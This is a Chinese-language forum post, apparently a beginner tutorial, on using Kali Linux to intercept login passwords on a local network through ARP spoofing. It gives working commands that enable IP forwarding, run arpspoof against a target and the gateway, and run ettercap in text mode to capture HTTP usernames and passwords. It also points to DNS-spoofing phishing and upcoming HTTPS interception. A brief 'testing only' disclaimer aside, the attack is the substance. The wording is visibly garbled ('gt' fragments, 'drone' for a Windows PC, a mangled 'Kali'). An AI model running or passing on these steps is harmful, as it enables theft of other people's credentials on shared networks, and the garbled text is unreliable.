小白网-奉贤部落-奉贤免费信息发布平台

查看: 15|回复: 0
打印 上一主题 下一主题

kali是如何通过ettercap中间人攻击嗅探目标上网登录密码的?

[复制链接]

2万

主题

2万

帖子

7万

积分

论坛元老

Rank: 8Rank: 8

积分
78182
跳转到指定楼层
楼主
发表于 2025-7-26 12:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
【kali如何通过ettercap中间人攻击嗅探目标的在线登录密码?】
最近一直在写关于局域网中间人攻击的小白教程,从最初的ARP缓存攻击到拦截局域网内任何电脑设备的上网记录;攻击DNS域名,替换别人正常访问的网页,重定向到山寨的钓鱼网页;后来我们谈到了使用kali的ettercap中间人套件在浏览时实时抓取目标的图片(以上课程仅用于安全目的的测试,禁止用于不正当目的!),同学们反映学习后收获很大,甚至问我能不能解释一下对HTTP/HTTPS的攻击。好了,首先在这里提前透露一下。另外,可以点击《中间人流量攻击完整教程》>; gt头条收购。
由于kali集成了ettercap和arpspoof,所以一般情况下,几个命令就可以获取HTTP登录页面的用户名和密码。
1.打开kali的路由转发。
echo 1  gt/proc/sys/net/ipv4/ip_forward
没有转发,会出现拒绝服务器。
2.打开ARP欺骗
Arpspoof -i eth0(网卡)-t 192.168.31.6(目标IP) 192.168.31.1(网关)
将kali伪装成网关并欺骗win10
3.在ettercap命令行模式下嗅探
ettercap -Tq -i eth0
-Tq指的是文本模式,指的是输出嗅到的url、用户名、密码和IP!
理想情况下,192.168.31.6这款win10无人机如果登录HTTP网页,会自动拦截登录时提交的用户名和密码。
原理:为什么HTTP网页中的登录密码可以被嗅探截获?首先你要明白,HTTP协议下网页的任何数据都是不加密的,提交给服务器的登录凭证都是明文传输的。这时候卡莉作为中间人嗅到了未加密的登录密码,当然!既然您理解了HTTP,HTTPS就不再令人困惑了。简单来说,如果一个网页使用HTTPS协议,这个网页上的数据传输是加密的。我们将在下节课详细讨论如何在HTTPS下获取登录密码!
有关对数据流量的更多中间人攻击、完整的网络安全和白帽黑客技术,请单击>: gt标题列>: gt去我的视频教程《白帽黑客kali渗透实用指南》。
注意@丮丮丮丮,从新手小白到白帽黑客!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|小白网-奉贤部落-奉贤免费信息发布平台  

GMT+8, 2025-8-22 02:04 , Processed in 0.053758 second(s), 22 queries .

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表